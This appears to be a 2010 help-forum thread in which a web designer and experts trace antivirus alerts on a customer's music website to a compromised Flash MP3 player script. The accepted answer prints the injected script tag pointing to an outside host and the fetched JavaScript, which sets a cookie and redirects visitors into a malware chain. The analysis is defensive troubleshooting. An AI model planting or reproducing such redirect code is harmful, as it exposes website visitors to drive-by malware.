Solved

expliot script injection 1573

Posted on 2010-08-23
10
1,174 Views
Last Modified: 2013-11-22
Hi, I've been reading here about this issue - I've got it from AVG9.0 with a customer's website, it appears as soon as I try to access any of his music pages - ballads for example.
It appears on all browsers, but doesn't happen if AVG not installed on a PC (I tried it).
I read that it could be due to "injected" javascript code, but this isn't the case for me.
The website in my case is http://www.heavenly-audio.com/audio/ballads/ballads.html.

Any ideas much appreciated.
0
Comment
Question by:mpcs_plymouth
  • 5
  • 3
  • 2
10 Comments
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33505320
Well your website has two scripts which does not belong to the original website:

http://www.google-analytics.com/ga.js
http://maxtracker.net/track_s/new_site.php?s=www.heavenly-audio.com

I am aware of the google-analytics however what is maxtracker.net (php) script is here for?

Try to get the Maxtracker script removed from the website and then try with AVG

Sudeep
0
 

Author Comment

by:mpcs_plymouth
ID: 33505475
Hi Sudeep,

Thanks for your prompt reply.  Thanks for pointing that out.... except that I can't find the script you mention?

Where did you find this and on which page - the one I mentioned?

Mike
0
 

Author Comment

by:mpcs_plymouth
ID: 33505539
Hi again, I think I've just found the offending code, not where I thought it was...

Will let you know the outcome ...
0
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33505542
Yes indeed, it is on the page you mentioned is giving you trouble.

How I found it?

I used Firefox with addon No Script.

Sudeep
0
 

Author Comment

by:mpcs_plymouth
ID: 33505642
It appears to come from "swobject.js", but luckily I've got an older backup of the webpage and this is identical.  Could it still be the problem, and not the HTML?
I did notice that the "Instrumental" page hasn't been affected yet, I guess it soon will... :/
0
Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33505722
A plain HTML would not be a issue since script injection could only be done by scripts (js, php etc) but it could not be done with HTML only (AFAIK)

Sudeep
0
 
LVL 12

Expert Comment

by:jahboite
ID: 33506787
you can just delete the last two lines of swfobject.js (i.e. the seconds_passed function, the iframe write and the call to setTimeout. see if that stops the warning.
0
 

Author Comment

by:mpcs_plymouth
ID: 33508383
Thanks for your suggestion jahboite but that didn't work I'm afraid, still get the same problem, see attached JPG for further clarity.  Still not sure if it's the website or AVG to be honest....?
Untitled-1.jpg
0
 
LVL 12

Accepted Solution

by:
jahboite earned 500 total points
ID: 33508959
Great job posting that screenshot mike, most helpful.

So I think you need to find an alternative way to play mp3 files because that flashmp3player.php script is definitely doing something dodgy - I suspect it is redirecting your visitors (in the background) to malware laden websites.

Like SSharma, I also use firefox and NoScript and this allows me to request a page, confident that any client-side code delivered in a response will not be executed unless I specifically allow it.

So I requested the following:

http : // www . heavenly-audio . com /audio/ballads/flashmp3player.php?file_dir=/index.html

Instead of supplying the file_dir parameter as an actual playlist, I've supplied just a valid file path ( /index.html).  The response looks like this

<?xml version="1.0" encoding="utf-8"?>
<playlist>
</playlist><script src="http : // onlineisdudescars . com/co . php"></script>

I've added the spaces in the url to prevent hyperlinking in this thread.  So what does the script at co.php look like? See The attached snippet of code shows what the script at co.php looks like. It's purpose is set a cookie and then redirect to protect-soft84. This is the start of a chain of several redirects involving heavily obfuscated javascripts (a technique used to make difficult the analysis of the script) and it's a fair bet that the intention is to attempt to infect the visitors' computers with malware (although I didn't go as far as to see what the payload was - I'm confident it's not nice).

So the first course of action is to make a backup of flashmp3player.php and then remove it from the server. This should stop the AVG alerts and prevent your site being blacklisted for delivering malware (it may already have been blacklisted however).

Then you will want to find out whether the script was always evil or whether someone has compromised your webserver and modified the script to be evil.

Always remember that third party scripts that you use on your website need to be carefully audited because you are giving permission for that third party to serve content to your visitors via your site.

Hope that helps a bit, please let us know how you get on.


function osc(cone,val,ex){

	var exdate=new Date();

	var da = exdate.getDate()+ex;

	exdate.setDate(da);

	var oo = exdate.toGMTString();



	document.cookie=cone+"="+escape(val)+";expires="+oo;



}



function ogc(cone){



	if (document.cookie.length>0){



		cose=document.cookie.indexOf(cone+"=");



		if (cose!=-1){

			cose=cose+cone.length+1;

			coee=document.cookie.indexOf(";",cose);

			if (coee==-1) 

				coee=document.cookie.length;

			return unescape(document.cookie.substring(cose,coee));

		}



	}

	return "";

}



var n=ogc("nopezorenope");



if (n==""){

	var pole="http : // www4 . protect-soft84 . co . cc /?p=p52dcWplbnCHnc3KbmNToKV1iqHWnG3LXsSYnGmZZmyaxA%3D%3D";



	osc("nopezorenope","1",20);



	window.top.location.replace(pole);

}

Open in new window

0
 

Author Closing Comment

by:mpcs_plymouth
ID: 33510037
Thanks to everyone who assisted on this one, I've elected to take the "revamp the flash music player" option, a pain to do, but at least should stop the problems.

I'll also be changing the FTP password as well!

Thanks again.
0

Featured Post

Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Article by: btan
The intent is not to repeat what many has know about Ransomware but more to join its dots of what is it, who are the victims, why it exists, when and how we respond on infection. Lastly, sum up in a glance to share such information with more to help…
Read about achieving the basic levels of HRIS security in the workplace.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, just open a new email message. In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…

910 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

23 Experts available now in Live!

Get 1:1 Help Now